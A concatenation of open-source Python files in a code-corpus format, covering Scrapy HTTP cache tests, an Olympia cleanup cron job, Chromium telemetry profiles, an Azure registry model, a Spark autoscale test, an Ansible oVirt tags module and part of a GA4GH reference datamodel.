self.assertEqual(response1.status, response2.status)
self.assertEqual(response1.headers, response2.headers)
self.assertEqual(response1.body, response2.body)
def assertEqualRequest(self, request1, request2):
self.assertEqual(request1.url, request2.url)
self.assertEqual(request1.headers, request2.headers)
self.assertEqual(request1.body, request2.body)
def assertEqualRequestButWithCacheValidators(self, request1, request2):
self.assertEqual(request1.url, request2.url)
assert not 'If-None-Match' in request1.headers
assert not 'If-Modified-Since' in request1.headers
assert any(h in request2.headers for h in ('If-None-Match', 'If-Modified-Since'))
self.assertEqual(request1.body, request2.body)
def test_dont_cache(self):
with self._middleware() as mw:
self.request.meta['dont_cache'] = True
mw.process_response(self.request, self.response, self.spider)
self.assertEqual(mw.storage.retrieve_response(self.spider, self.request), None)
with self._middleware() as mw:
self.request.meta['dont_cache'] = False
mw.process_response(self.request, self.response, self.spider)
if mw.policy.should_cache_response(self.response, self.request):
self.assertIsInstance(mw.storage.retrieve_response(self.spider, self.request), self.response.__class__)
class DefaultStorageTest(_BaseTest):
def test_storage(self):
with self._storage() as storage:
request2 = self.request.copy()
assert storage.retrieve_response(self.spider, request2) is None
storage.store_response(self.spider, self.request, self.response)
response2 = storage.retrieve_response(self.spider, request2)
assert isinstance(response2, HtmlResponse) # content-type header
self.assertEqualResponse(self.response, response2)
time.sleep(2) # wait for cache to expire
assert storage.retrieve_response(self.spider, request2) is None
def test_storage_never_expire(self):
with self._storage(HTTPCACHE_EXPIRATION_SECS=0) as storage:
assert storage.retrieve_response(self.spider, self.request) is None
storage.store_response(self.spider, self.request, self.response)
time.sleep(0.5) # give the chance to expire
assert storage.retrieve_response(self.spider, self.request)
class DbmStorageTest(DefaultStorageTest):
storage_class = 'scrapy.contrib.httpcache.DbmCacheStorage'
class DbmStorageWithCustomDbmModuleTest(DbmStorageTest):
dbm_module = 'tests.mocks.dummydbm'
def _get_settings(self, **new_settings):
new_settings.setdefault('HTTPCACHE_DBM_MODULE', self.dbm_module)
return super(DbmStorageWithCustomDbmModuleTest, self)._get_settings(**new_settings)
def test_custom_dbm_module_loaded(self):
# make sure our dbm module has been loaded
with self._storage() as storage:
self.assertEqual(storage.dbmodule.__name__, self.dbm_module)
class FilesystemStorageTest(DefaultStorageTest):
storage_class = 'scrapy.contrib.httpcache.FilesystemCacheStorage'
class FilesystemStorageGzipTest(FilesystemStorageTest):
def _get_settings(self, **new_settings):
new_settings.setdefault('HTTPCACHE_GZIP', True)
return super(FilesystemStorageTest, self)._get_settings(**new_settings)
class LeveldbStorageTest(DefaultStorageTest):
pytest.importorskip('leveldb')
storage_class = 'scrapy.contrib.httpcache.LeveldbCacheStorage'
class DummyPolicyTest(_BaseTest):
policy_class = 'scrapy.contrib.httpcache.DummyPolicy'
def test_middleware(self):
with self._middleware() as mw:
assert mw.process_request(self.request, self.spider) is None
mw.process_response(self.request, self.response, self.spider)
response = mw.process_request(self.request, self.spider)
assert isinstance(response, HtmlResponse)
self.assertEqualResponse(self.response, response)
assert 'cached' in response.flags
def test_different_request_response_urls(self):
with self._middleware() as mw:
req = Request('http://host.com/path')
res = Response('http://host2.net/test.html')
assert mw.process_request(req, self.spider) is None
mw.process_response(req, res, self.spider)
cached = mw.process_request(req, self.spider)
assert isinstance(cached, Response)
self.assertEqualResponse(res, cached)
assert 'cached' in cached.flags
def test_middleware_ignore_missing(self):
with self._middleware(HTTPCACHE_IGNORE_MISSING=True) as mw:
self.assertRaises(IgnoreRequest, mw.process_request, self.request, self.spider)
mw.process_response(self.request, self.response, self.spider)
response = mw.process_request(self.request, self.spider)
assert isinstance(response, HtmlResponse)
self.assertEqualResponse(self.response, response)
assert 'cached' in response.flags
def test_middleware_ignore_schemes(self):
# http responses are cached by default
req, res = Request('http://test.com/'), Response('http://test.com/')
with self._middleware() as mw:
assert mw.process_request(req, self.spider) is None
mw.process_response(req, res, self.spider)
cached = mw.process_request(req, self.spider)
assert isinstance(cached, Response), type(cached)
self.assertEqualResponse(res, cached)
assert 'cached' in cached.flags
# file response is not cached by default
req, res = Request('file:///tmp/t.txt'), Response('file:///tmp/t.txt')
with self._middleware() as mw:
assert mw.process_request(req, self.spider) is None
mw.process_response(req, res, self.spider)
assert mw.storage.retrieve_response(self.spider, req) is None
assert mw.process_request(req, self.spider) is None
# s3 scheme response is cached by default
req, res = Request('s3://bucket/key'), Response('http://bucket/key')
with self._middleware() as mw:
assert mw.process_request(req, self.spider) is None
mw.process_response(req, res, self.spider)
cached = mw.process_request(req, self.spider)
assert isinstance(cached, Response), type(cached)
self.assertEqualResponse(res, cached)
assert 'cached' in cached.flags
# ignore s3 scheme
req, res = Request('s3://bucket/key2'), Response('http://bucket/key2')
with self._middleware(HTTPCACHE_IGNORE_SCHEMES=['s3']) as mw:
assert mw.process_request(req, self.spider) is None
mw.process_response(req, res, self.spider)
assert mw.storage.retrieve_response(self.spider, req) is None
assert mw.process_request(req, self.spider) is None
def test_middleware_ignore_http_codes(self):
# test response is not cached
with self._middleware(HTTPCACHE_IGNORE_HTTP_CODES=[202]) as mw:
assert mw.process_request(self.request, self.spider) is None
mw.process_response(self.request, self.response, self.spider)
assert mw.storage.retrieve_response(self.spider, self.request) is None
assert mw.process_request(self.request, self.spider) is None
# test response is cached
with self._middleware(HTTPCACHE_IGNORE_HTTP_CODES=[203]) as mw:
mw.process_response(self.request, self.response, self.spider)
response = mw.process_request(self.request, self.spider)
assert isinstance(response, HtmlResponse)
self.assertEqualResponse(self.response, response)
assert 'cached' in response.flags
class RFC2616PolicyTest(DefaultStorageTest):
policy_class = 'scrapy.contrib.httpcache.RFC2616Policy'
def _process_requestresponse(self, mw, request, response):
try:
result = mw.process_request(request, self.spider)
if result:
assert isinstance(result, (Request, Response))
return result
else:
result = mw.process_response(request, response, self.spider)
assert isinstance(result, Response)
return result
except Exception:
print('Request', request)
print('Response', response)
print('Result', result)
raise
def test_request_cacheability(self):
res0 = Response(self.request.url, status=200,
headers={'Expires': self.tomorrow})
req0 = Request('http://example.com')
req1 = req0.replace(headers={'Cache-Control': 'no-store'})
req2 = req0.replace(headers={'Cache-Control': 'no-cache'})
with self._middleware() as mw:
# response for a request with no-store must not be cached
res1 = self._process_requestresponse(mw, req1, res0)
self.assertEqualResponse(res1, res0)
assert mw.storage.retrieve_response(self.spider, req1) is None
# Re-do request without no-store and expect it to be cached
res2 = self._process_requestresponse(mw, req0, res0)
assert 'cached' not in res2.flags
res3 = mw.process_request(req0, self.spider)
assert 'cached' in res3.flags
self.assertEqualResponse(res2, res3)
# request with no-cache directive must not return cached response
# but it allows new response to be stored
res0b = res0.replace(body='foo')
res4 = self._process_requestresponse(mw, req2, res0b)
self.assertEqualResponse(res4, res0b)
assert 'cached' not in res4.flags
res5 = self._process_requestresponse(mw, req0, None)
self.assertEqualResponse(res5, res0b)
assert 'cached' in res5.flags
def test_response_cacheability(self):
responses = [
# 304 is not cacheable no matter what servers sends
(False, 304, {}),
(False, 304, {'Last-Modified': self.yesterday}),
(False, 304, {'Expires': self.tomorrow}),
(False, 304, {'Etag': 'bar'}),
(False, 304, {'Cache-Control': 'max-age=3600'}),
# Always obey no-store cache control
(False, 200, {'Cache-Control': 'no-store'}),
(False, 200, {'Cache-Control': 'no-store, max-age=300'}), # invalid
(False, 200, {'Cache-Control': 'no-store', 'Expires': self.tomorrow}), # invalid
# Ignore responses missing expiration and/or validation headers
(False, 200, {}),
(False, 302, {}),
(False, 307, {}),
(False, 404, {}),
# Cache responses with expiration and/or validation headers
(True, 200, {'Last-Modified': self.yesterday}),
(True, 203, {'Last-Modified': self.yesterday}),
(True, 300, {'Last-Modified': self.yesterday}),
(True, 301, {'Last-Modified': self.yesterday}),
(True, 401, {'Last-Modified': self.yesterday}),
(True, 404, {'Cache-Control': 'public, max-age=600'}),
(True, 302, {'Expires': self.tomorrow}),
(True, 200, {'Etag': 'foo'}),
]
with self._middleware() as mw:
for idx, (shouldcache, status, headers) in enumerate(responses):
req0 = Request('http://example-%d.com' % idx)
res0 = Response(req0.url, status=status, headers=headers)
res1 = self._process_requestresponse(mw, req0, res0)
res304 = res0.replace(status=304)
res2 = self._process_requestresponse(mw, req0, res304 if shouldcache else res0)
self.assertEqualResponse(res1, res0)
self.assertEqualResponse(res2, res0)
resc = mw.storage.retrieve_response(self.spider, req0)
if shouldcache:
self.assertEqualResponse(resc, res1)
assert 'cached' in res2.flags and res2.status != 304
else:
self.assertFalse(resc)
assert 'cached' not in res2.flags
def test_cached_and_fresh(self):
sampledata = [
(200, {'Date': self.yesterday, 'Expires': self.tomorrow}),
(200, {'Date': self.yesterday, 'Cache-Control': 'max-age=86405'}),
(200, {'Age': '299', 'Cache-Control': 'max-age=300'}),
# Obey max-age if present over any others
(200, {'Date': self.today,
'Age': '86405',
'Cache-Control': 'max-age=' + str(86400 * 3),
'Expires': self.yesterday,
'Last-Modified': self.yesterday,
}),
# obey Expires if max-age is not present
(200, {'Date': self.yesterday,
'Age': '86400',
'Cache-Control': 'public',
'Expires': self.tomorrow,
'Last-Modified': self.yesterday,
}),
# Default missing Date header to right now
(200, {'Expires': self.tomorrow}),
# Firefox - Expires if age is greater than 10% of (Date - Last-Modified)
(200, {'Date': self.today, 'Last-Modified': self.yesterday, 'Age': str(86400 / 10 - 1)}),
# Firefox - Set one year maxage to permanent redirects missing expiration info
(300, {}), (301, {}), (308, {}),
]
with self._middleware() as mw:
for idx, (status, headers) in enumerate(sampledata):
req0 = Request('http://example-%d.com' % idx)
res0 = Response(req0.url, status=status, headers=headers)
# cache fresh response
res1 = self._process_requestresponse(mw, req0, res0)
self.assertEqualResponse(res1, res0)
assert 'cached' not in res1.flags
# return fresh cached response without network interaction
res2 = self._process_requestresponse(mw, req0, None)
self.assertEqualResponse(res1, res2)
assert 'cached' in res2.flags
def test_cached_and_stale(self):
sampledata = [
(200, {'Date': self.today, 'Expires': self.yesterday}),
(200, {'Date': self.today, 'Expires': self.yesterday, 'Last-Modified': self.yesterday}),
(200, {'Expires': self.yesterday}),
(200, {'Expires': self.yesterday, 'ETag': 'foo'}),
(200, {'Expires': self.yesterday, 'Last-Modified': self.yesterday}),
(200, {'Expires': self.tomorrow, 'Age': '86405'}),
(200, {'Cache-Control': 'max-age=86400', 'Age': '86405'}),
# no-cache forces expiration, also revalidation if validators exists
(200, {'Cache-Control': 'no-cache'}),
(200, {'Cache-Control': 'no-cache', 'ETag': 'foo'}),
(200, {'Cache-Control': 'no-cache', 'Last-Modified': self.yesterday}),
]
with self._middleware() as mw:
for idx, (status, headers) in enumerate(sampledata):
req0 = Request('http://example-%d.com' % idx)
res0a = Response(req0.url, status=status, headers=headers)
# cache expired response
res1 = self._process_requestresponse(mw, req0, res0a)
self.assertEqualResponse(res1, res0a)
assert 'cached' not in res1.flags
# Same request but as cached response is stale a new response must
# be returned
res0b = res0a.replace(body='bar')
res2 = self._process_requestresponse(mw, req0, res0b)
self.assertEqualResponse(res2, res0b)
assert 'cached' not in res2.flags
# Previous response expired too, subsequent request to same
# resource must revalidate and succeed on 304 if validators
# are present
if 'ETag' in headers or 'Last-Modified' in headers:
res0c = res0b.replace(status=304)
res3 = self._process_requestresponse(mw, req0, res0c)
self.assertEqualResponse(res3, res0b)
assert 'cached' in res3.flags
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
magopian/olympia | apps/files/cron.py | 15 | 1534 | import hashlib
import os
import shutil
import stat
import time
from django.conf import settings
from django.core.cache import cache
import commonware.log
import cronjobs
from files.models import FileValidation
log = commonware.log.getLogger('z.cron')
@cronjobs.register
def cleanup_extracted_file():
log.info('Removing extracted files for file viewer.')
root = os.path.join(settings.TMP_PATH, 'file_viewer')
for path in os.listdir(root):
full = os.path.join(root, path)
age = time.time() - os.stat(full)[stat.ST_ATIME]
if age > 60 * 60:
log.debug('Removing extracted files: %s, %dsecs old.' %
(full, age))
shutil.rmtree(full)
# Nuke out the file and diff caches when the file gets removed.
id = os.path.basename(path)
try:
int(id)
except ValueError:
continue
key = hashlib.md5()
key.update(str(id))
cache.delete('%s:memoize:%s:%s' % (settings.CACHE_PREFIX,
'file-viewer', key.hexdigest()))
@cronjobs.register
def cleanup_validation_results():
"""Will remove all validation results. Used when the validator is
upgraded and results may no longer be relevant."""
# With a large enough number of objects not using no_cache() tracebacks
all = FileValidation.objects.no_cache().all()
log.info('Removing %s old validation results.' % (all.count()))
all.delete()
| bsd-3-clause |
imply/chuu | tools/telemetry/telemetry/core/profile_types.py | 23 | 2733 | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from telemetry.core import discover
from telemetry.core import profile_creator
BASE_PROFILE_TYPES = ['clean', 'default']
PROFILE_CREATORS = {}
PROFILE_TYPE_MAPPING = {
'typical_user': 'chrome/test/data/extensions/profiles/content_scripts1',
'power_user': 'chrome/test/data/extensions/profiles/extension_webrequest',
}
def _DiscoverCreateableProfiles(profile_creators_dir, base_dir):
"""Returns a dictionary of all the profile creators we can use to create
a Chrome profile for testing located in |profile_creators_dir|.
The returned value consists of 'class_name' -> 'test class' dictionary where
class_name is the name of the class with the _creator suffix removed e.g.
'small_profile_creator will be 'small_profile'.
"""
profile_creators_unfiltered = discover.DiscoverClasses(
profile_creators_dir, base_dir, profile_creator.ProfileCreator)
# Remove '_creator' suffix from keys.
profile_creators = {}
for test_name, test_class in profile_creators_unfiltered.iteritems():
assert test_name.endswith('_creator')
test_name = test_name[:-len('_creator')]
profile_creators[test_name] = test_class
return profile_creators
def ClearProfieCreatorsForTests():
"""Clears the discovered profile creator objects. Used for unit tests."""
PROFILE_CREATORS.clear()
def FindProfileCreators(profile_creators_dir, base_dir):
"""Discover all the ProfileCreator objects in |profile_creators_dir|."""
assert not PROFILE_CREATORS # It's illegal to call this function twice.
PROFILE_CREATORS.update(_DiscoverCreateableProfiles(
profile_creators_dir, base_dir))
def GetProfileTypes():
"""Returns a list of all command line options that can be specified for
profile type."""
return (BASE_PROFILE_TYPES + PROFILE_TYPE_MAPPING.keys() +
PROFILE_CREATORS.keys())
def GetProfileDir(profile_type):
"""Given a |profile_type| (as returned by GetProfileTypes()), return the
directory to use for that profile or None if the profile needs to be generated
or doesn't need a profile directory (e.g. using the browser default profile).
"""
if (profile_type in BASE_PROFILE_TYPES or
profile_type in PROFILE_CREATORS):
return None
path = os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', '..', '..', '..', *PROFILE_TYPE_MAPPING[profile_type].split('/')))
assert os.path.exists(path)
return path
def GetProfileCreator(profile_type):
"""Returns the profile creator object corresponding to the |profile_type|
string."""
return PROFILE_CREATORS.get(profile_type)
| bsd-3-clause |
lmazuel/azure-sdk-for-python | azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2017_10_01/models/registry_list_credentials_result.py | 2 | 1159 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class RegistryListCredentialsResult(Model):
"""The response from the ListCredentials operation.
:param username: The username for a container registry.
:type username: str
:param passwords: The list of passwords for a container registry.
:type passwords:
list[~azure.mgmt.containerregistry.v2017_10_01.models.RegistryPassword]
"""
_attribute_map = {
'username': {'key': 'username', 'type': 'str'},
'passwords': {'key': 'passwords', 'type': '[RegistryPassword]'},
}
def __init__(self, username=None, passwords=None):
self.username = username
self.passwords = passwords
| mit |
maropu/spark | resource-managers/kubernetes/integration-tests/tests/autoscale.py | 23 | 1592 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import time
from pyspark.sql import SparkSession
if __name__ == "__main__":
"""
Usage: autoscale
"""
print("Starting autoscale test")
spark = SparkSession \
.builder \
.appName("AutoScale") \
.getOrCreate()
sc = spark._sc
initialRdd = sc.parallelize(range(100), 5)
# Trigger a shuffle so there are shuffle blocks to migrate
rdd = initialRdd.map(lambda x: (x, x)).groupByKey()
rdd.collect()
numCores = sc._jsc.sc().getExecutorMemoryStatus().size()
print("Have " + str(numCores))
print("Waiting for dynamic alloc")
time.sleep(150)
print("Finished waiting!")
rdd.count()
rdd.collect()
print("Finished waiting, stopping Spark.")
spark.stop()
print("Done, exiting Python")
sys.exit(0)
| apache-2.0 |
adityacs/ansible | lib/ansible/modules/cloud/ovirt/ovirt_tags.py | 7 | 6533 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: ovirt_tags
short_description: Module to manage tags in oVirt
version_added: "2.3"
author: "Ondra Machacek (@machacekondra)"
description:
- "This module manage tags in oVirt. It can also manage assignments
of those tags to entities."
options:
name:
description:
- "Name of the the tag to manage."
required: true
state:
description:
- "Should the tag be present or absent."
choices: ['present', 'absent']
default: present
description:
description:
- "Description of the the tag to manage."
parent:
description:
- "Name of the parent tag."
vms:
description:
- "List of the VMs names, which should have assigned this tag."
extends_documentation_fragment: ovirt
'''
EXAMPLES = '''
# Examples don't contain auth parameter for simplicity,
# look at ovirt_auth module to see how to reuse authentication:
# Create(if not exists) and assign tag to vms vm1 and vm2:
- ovirt_tags:
name: mytag
vms:
- vm1
- vm2
# To detach all VMs from tag:
- ovirt_tags:
name: mytag
vms: []
# Remove tag
- ovirt_tags:
state: absent
name: mytag
'''
RETURN = '''
id:
description: ID of the tag which is managed
returned: On success if tag is found.
type: str
sample: 7de90f31-222c-436c-a1ca-7e655bd5b60c
tag:
description: "Dictionary of all the tag attributes. Tag attributes can be found on your oVirt instance
at following url: https://ovirt.example.com/ovirt-engine/api/model#types/tag."
returned: On success if tag is found.
'''
import traceback
try:
import ovirtsdk4.types as otypes
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ovirt import (
BaseModule,
check_sdk,
create_connection,
equal,
ovirt_full_argument_spec,
search_by_name,
)
class TagsModule(BaseModule):
def build_entity(self):
return otypes.Tag(
name=self._module.params['name'],
description=self._module.params['description'],
parent=otypes.Tag(
name=self._module.params['parent'],
) if self._module.params['parent'] else None,
)
def post_create(self, entity):
self.update_check(entity)
def _update_tag_assignments(self, entity, name):
if self._module.params[name] is None:
return
entities_service = getattr(self._connection.system_service(), '%s_service' % name)()
current_vms = [
vm.name
for vm in entities_service.list(search='tag=%s' % self._module.params['name'])
]
# Assign tags:
for entity_name in self._module.params[name]:
entity = search_by_name(entities_service, entity_name)
tags_service = entities_service.service(entity.id).tags_service()
current_tags = [tag.name for tag in tags_service.list()]
# Assign the tag:
if self._module.params['name'] not in current_tags:
if not self._module.check_mode:
tags_service.add(
tag=otypes.Tag(
name=self._module.params['name'],
),
)
self.changed = True
# Unassign tags:
for entity_name in [e for e in current_vms if e not in self._module.params[name]]:
if not self._module.check_mode:
entity = search_by_name(entities_service, entity_name)
tags_service = entities_service.service(entity.id).tags_service()
tag_id = [tag.id for tag in tags_service.list() if tag.name == self._module.params['name']][0]
tags_service.tag_service(tag_id).remove()
self.changed = True
def _get_parent(self, entity):
parent = None
if entity.parent:
parent = self._connection.follow_link(entity.parent).name
return parent
def update_check(self, entity):
self._update_tag_assignments(entity, 'vms')
self._update_tag_assignments(entity, 'hosts')
return (
equal(self._module.params.get('description'), entity.description) and
equal(self._module.params.get('parent'), self._get_parent(entity))
)
def main():
argument_spec = ovirt_full_argument_spec(
state=dict(
choices=['present', 'absent'],
default='present',
),
name=dict(default=None, required=True),
description=dict(default=None),
parent=dict(default=None),
vms=dict(default=None, type='list'),
hosts=dict(default=None, type='list'),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
check_sdk(module)
try:
auth = module.params.pop('auth')
connection = create_connection(auth)
tags_service = connection.system_service().tags_service()
tags_module = TagsModule(
connection=connection,
module=module,
service=tags_service,
)
state = module.params['state']
if state == 'present':
ret = tags_module.create()
elif state == 'absent':
ret = tags_module.remove()
module.exit_json(**ret)
except Exception as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
finally:
connection.close(logout=auth.get('token') is None)
if __name__ == "__main__":
main()
| gpl-3.0 |
diekhans/ga4gh-server | ga4gh/datamodel/references.py | 2 | 15873 | """
Module responsible for translating reference sequence data into GA4GH native
objects.
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import hashlib
import json
import os
import random
import pysam
import ga4gh.datamodel as datamodel
import ga4gh.protocol as protocol
import ga4gh.exceptions as exceptions
DEFAULT_REFERENCESET_NAME = "Default"
"""
This is the name used for any reference set referred to in a BAM
file that does not provide the 'AS' tag in the @SQ header.
"""
class AbstractReferenceSet(datamodel.DatamodelObject):
"""
Class representing ReferenceSets. A ReferenceSet is a set of
References which typically comprise a reference assembly, such as
GRCh38.
"""
compoundIdClass = datamodel.ReferenceSetCompoundId
def __init__(self, localId):
super(AbstractReferenceSet, self).__init__(None, localId)
self._referenceIdMap = {}
self._referenceNameMap = {}
self._referenceIds = []
self._assemblyId = None
self._description = None
self._isDerived = False
self._ncbiTaxonId = None
self._sourceAccessions = []
self._sourceUri = None
def addReference(self, reference):
"""
Adds the specified reference to this ReferenceSet.
"""
id_ = reference.getId()
self._referenceIdMap[id_] = reference
self._referenceNameMap[reference.getLocalId()] = reference
self._referenceIds.append(id_)
def getReferences(self):
"""
Returns the References in this ReferenceSet.
"""
return [self._referenceIdMap[id_] for id_ in self._referenceIds]
def getNumReferences(self):
"""
Returns the number of references in this ReferenceSet.
"""
return len(self._referenceIds)
def getReferenceByIndex(self, index):
"""
Returns the reference at the specified index in this ReferenceSet.
"""
return self._referenceIdMap[self._referenceIds[index]]
def getReferenceByName(self, name):
"""
Returns the reference with the specified name.
"""
if name not in self._referenceNameMap:
raise exceptions.ReferenceNameNotFoundException(name)
return self._referenceNameMap[name]
def getReference(self, id_):
"""
Returns the Reference with the specified ID or raises a
ReferenceNotFoundException if it does not exist.
"""
if id_ not in self._referenceIdMap:
raise exceptions.ReferenceNotFoundException(id_)
return self._referenceIdMap[id_]
def getMd5Checksum(self):
"""
Returns the MD5 checksum for this reference set. This checksum is
calculated by making a list of `Reference.md5checksum` for all
`Reference`s in this set. We then sort this list, and take the
MD5 hash of all the strings concatenated together.
"""
references = sorted(
self.getReferences(),
key=lambda ref: ref.getMd5Checksum())
checksums = ''.join([ref.getMd5Checksum() for ref in references])
md5checksum = hashlib.md5(checksums).hexdigest()
return md5checksum
def getAssemblyId(self):
"""
Returns the assembly ID for this reference set.
This is the public id of this reference set, such as `GRCh37`
"""
return self._assemblyId
def getDescription(self):
"""
Returns the free text description of this reference set.
"""
return self._description
def getIsDerived(self):
"""
Returns True if this ReferenceSet is derived. A ReferenceSet
may be derived from a source if it contains additional sequences,
or some of the sequences within it are derived.
"""
return self._isDerived
def getSourceAccessions(self):
"""
Returns the list of source accession strings. These are all known
corresponding accession IDs in INSDC (GenBank/ENA/DDBJ) ideally
with a version number, e.g. `NC_000001.11`.
"""
return self._sourceAccessions
def getSourceUri(self):
"""
Returns the sourceURI for this ReferenceSet.
"""
return self._sourceUri
def getNcbiTaxonId(self):
"""
Returns the NCBI Taxon ID for this reference set. This is the
ID from http://www.ncbi.nlm.nih.gov/taxonomy (e.g. 9606->human)
indicating the species which this assembly is intended to model.
Note that contained `Reference`s may specify a different
`ncbiTaxonId`, as assemblies may contain reference sequences
which do not belong to the modeled species, e.g. EBV in a
human reference genome.
"""
return self._ncbiTaxonId
def toProtocolElement(self):
"""
Returns the GA4GH protocol representation of this ReferenceSet.
"""
ret = protocol.ReferenceSet()
ret.assemblyId = self.getAssemblyId()
ret.description = self.getDescription()
ret.id = self.getId()
ret.isDerived = self.getIsDerived()
ret.md5checksum = self.getMd5Checksum()
ret.ncbiTaxonId = self.getNcbiTaxonId()
ret.referenceIds = self._referenceIds
ret.sourceAccessions = self.getSourceAccessions()
ret.sourceURI = self.getSourceUri()
ret.name = self.getLocalId()
return ret
class AbstractReference(datamodel.DatamodelObject):
"""
Class representing References. A Reference is a canonical
assembled contig, intended to act as a reference coordinate space
for other genomic annotations. A single Reference might represent
the human chromosome 1, for instance.
"""
compoundIdClass = datamodel.ReferenceCompoundId
def __init__(self, parentContainer, localId):
super(AbstractReference, self).__init__(parentContainer, localId)
self._length = -1
self._md5checksum = ""
self._sourceUri = None
self._sourceAccessions = []
self._isDerived = False
self._sourceDivergence = None
self._ncbiTaxonId = None
def getLength(self):
"""
Returns the length of this reference's sequence string.
"""
return self._length
def getName(self):
"""
Returns the name of this reference, e.g., '22'.
"""
return self.getLocalId()
def getIsDerived(self):
"""
Returns True if this Reference is derived. A sequence X is said to be
derived from source sequence Y, if X and Y are of the same length and
the per-base sequence divergence at A/C/G/T bases is sufficiently
small. Two sequences derived from the same official sequence share the
same coordinates and annotations, and can be replaced with the official
sequence for certain use cases.
"""
return self._isDerived
def getSourceDivergence(self):
"""
Returns the source divergence for this reference. The sourceDivergence
is the fraction of non-indel bases that do not match the
reference this record was derived from.
"""
return self._sourceDivergence
def getSourceAccessions(self):
"""
Returns the list of source accession strings. These are all known
corresponding accession IDs in INSDC (GenBank/ENA/DDBJ) ideally
with a version number, e.g. `NC_000001.11`.
"""
return self._sourceAccessions
def getSourceUri(self):
"""
The URI from which the sequence was obtained. Specifies a FASTA format
file/string with one name, sequence pair.
"""
return self._sourceUri
def getNcbiTaxonId(self):
"""
Returns the NCBI Taxon ID for this reference. This is the
ID from http://www.ncbi.nlm.nih.gov/taxonomy (e.g. 9606->human)
indicating the species which this assembly is intended to model.
Note that contained `Reference`s may specify a different
`ncbiTaxonId`, as assemblies may contain reference sequences
which do not belong to the modeled species, e.g. EBV in a
human reference genome.
"""
return self._ncbiTaxonId
def getMd5Checksum(self):
"""
Returns the MD5 checksum uniquely representing this `Reference` as a
lower-case hexadecimal string, calculated as the MD5 of the upper-case
sequence excluding all whitespace characters.
"""
return self._md5checksum
def toProtocolElement(self):
"""
Returns the GA4GH protocol representation of this Reference.
"""
reference = protocol.Reference()
reference.id = self.getId()
reference.isDerived = self.getIsDerived()
reference.length = self.getLength()
reference.md5checksum = self.getMd5Checksum()
reference.name = self.getName()
reference.ncbiTaxonId = self.getNcbiTaxonId()
reference.sourceAccessions = self.getSourceAccessions()
reference.sourceDivergence = self.getSourceDivergence()
reference.sourceURI = self.getSourceUri()
return reference
def checkQueryRange(self, start, end):
"""
Checks to ensure that the query range is valid within this reference.
If not, raise ReferenceRangeErrorException.
"""
condition = (
(start < 0 or end > self.getLength()) or
start > end)
if condition:
raise exceptions.ReferenceRangeErrorException(
self.getId(), start, end)
def getBases(self, start, end):
"""
Returns the string representing the bases of this reference from
start (inclusive) to end (exclusive).
"""
raise NotImplemented()
##################################################################
#
# Simulated references
#
##################################################################
class SimulatedReferenceSet(AbstractReferenceSet):
"""
A simulated referenceSet
"""
def __init__(self, localId, randomSeed=0, numReferences=1):
super(SimulatedReferenceSet, self).__init__(localId)
self._randomSeed = randomSeed
self._randomGenerator = random.Random()
self._randomGenerator.seed(self._randomSeed)
self._description = "Simulated reference set"
self._assemblyId = str(random.randint(0, 2**32))
self._isDerived = bool(random.randint(0, 1))
self._ncbiTaxonId = random.randint(0, 2**16)
self._sourceAccessions = []
for i in range(random.randint(1, 3)):
self._sourceAccessions.append("sim_accession_{}".format(
random.randint(1, 2**32)))
self._sourceUri = "http://example.com/reference.fa"
for i in range(numReferences):
referenceSeed = self._randomGenerator.getrandbits(32)
referenceLocalId = "srs{}".format(i)
reference = SimulatedReference(
self, referenceLocalId, referenceSeed)
self.addReference(reference)
class SimulatedReference(AbstractReference):
"""
A simulated reference. Stores a random sequence of a given length, and
generates remaining attributes randomly.
"""
def __init__(self, parentContainer, localId, randomSeed=0, length=200):
super(SimulatedReference, self).__init__(parentContainer, localId)
rng = random.Random()
rng.seed(randomSeed)
self._length = length
bases = [rng.choice('ACGT') for _ in range(self._length)]
self._bases = ''.join(bases)
self._md5checksum = hashlib.md5(self._bases).hexdigest()
self._isDerived = bool(rng.randint(0, 1))
self._sourceDivergence = 0
if self._isDerived:
self._sourceDivergence = rng.uniform(0, 0.1)
self._ncbiTaxonId = random.randint(0, 2**16)
self._sourceAccessions = []
for i in range(random.randint(1, 3)):
self._sourceAccessions.append("sim_accession_{}".format(
random.randint(1, 2**32)))
self._sourceUri = "http://example.com/reference.fa"
def getBases(self, start, end):
self.checkQueryRange(start, end)
return self._bases[start:end]
##################################################################
#
# References based on htslib's FASTA file handling.
#
##################################################################
class HtslibReferenceSet(datamodel.PysamDatamodelMixin, AbstractReferenceSet):
"""
A referenceSet based on data on a file system
"""
def __init__(self, localId, dataDir, backend):
